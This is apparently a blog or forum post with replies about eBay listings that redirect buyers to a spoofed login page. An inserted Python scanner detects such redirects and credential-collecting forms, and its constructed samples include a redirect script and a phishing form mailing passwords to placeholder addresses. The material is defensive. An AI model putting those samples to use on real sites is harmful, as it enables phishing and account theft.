Tonight while surfing a few eBay auctions… I came across a pretty bad and suspicious exploit that's running around eBay now. I'm contacting eBay as I write this…
When searching for items, I came to a bunch of items that, when clicked on to see more, would quickly redirect to another page, a login page.
Here’s the initial page:
I clicked on the Supra ad, with the RED BOX around it… It automatically redirected me to this page:
Notice the URL, spoofed page… After you enter your information it will automatically transfer you to the REAL eBay login. To someone that doesn't pay attention, you might not be concerned with this and continue to log in again.
The severity of this issue is great, because the links and redirections are happening automatically within the REAL eBay site. Not to mention the logging of your username and password, and forwarding to countless individuals who created the spoof page. Now they have access to a TON of personal information.
I have a feeling that the redirection is occurring within the HTML of the auction itself. So immediately once a person clicks on the link, the HTML within the eBay description executes a redirection within “_self” …
Either way, PAY VERY close attention to what you're doing on eBay, and every site for that matter. I hope they address this quickly, before too many people are hit. While surfing some more, I found A TON of new ads and links with this… everything from auto ads to computer gear…
While looking closer into the source of the “spoofed” page, you'll see that the information you enter into the “Form” (using Form structure) is being sent to -> “fleasca10@gmail.com”
So the guy/gal is receiving a TON of new usernames and passwords… What a chump…
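Added example, not part of the original post: a small check a marketplace could run over seller-supplied listing HTML for the two behaviours described above, an automatic redirect of the current window and a login form that sends what is typed to an e-mail address. The post does not show the actual page source, so the sample markup, host names and addresses below are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: placeholder for the marketplace's own hosts.
TRUSTED_HOSTS = {"www.marketplace.example"}
# Script that navigates the current window: location assignment or window.open(..., "_self").
NAV_RE = re.compile(
    r"location\s*(\.href)?\s*=|location\.(replace|assign)\s*\(|window\.open\s*\([^)]*_self", re.I)

class ListingScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._in_script, self._in_form = [], False, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect")
        elif tag == "script":
            self._in_script = True
        elif tag == "form":
            self._in_form = True
            url = urlparse(a.get("action", ""))
            if url.scheme == "mailto":
                self.findings.append("form submits to a mailto: address")
            elif url.hostname and url.hostname not in TRUSTED_HOSTS:
                self.findings.append("form posts to untrusted host " + url.hostname)
        elif tag == "input" and self._in_form and a.get("type", "").lower() == "password":
            self.findings.append("password field inside a form")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "form":
            self._in_form = False

    def handle_data(self, data):
        if self._in_script and NAV_RE.search(data):
            self.findings.append("script navigates the current window")

def scan(html):
    scanner = ListingScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples (not taken from the real listing or spoof page).
REDIRECT = '<p>Supra</p><script>window.open("http://signin.invalid/", "_self");</script>'
SPOOF = ('<form action="mailto:collector@example.invalid" method="post">'
         '<input name="userid"><input type="password" name="pass"></form>')
print(scan(REDIRECT), scan(SPOOF), scan("<p>Low miles, <b>clean title</b>.</p>"))
```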
Yeah, you should know that you don't need to be signed in just to view an auction, and asking for you to sign in like that is a big giveaway. But I guess that happens too fast; people won't realise it.
If anyone notices one of these again, I have a contact at eBay (through work) that will shut these down right away; all I have to do is email her.
I get about 5-6 emails a day that look like someone has sent you a question on one of your items. Then when you click on it, it takes you to the same page to log in.
I like how it says the account protection tips; if you were to see that and check the address you might be like, oh shit, close call. But people don't even look at that shit. I get a million and a half of these via email trying to get my info via fake PayPal sites.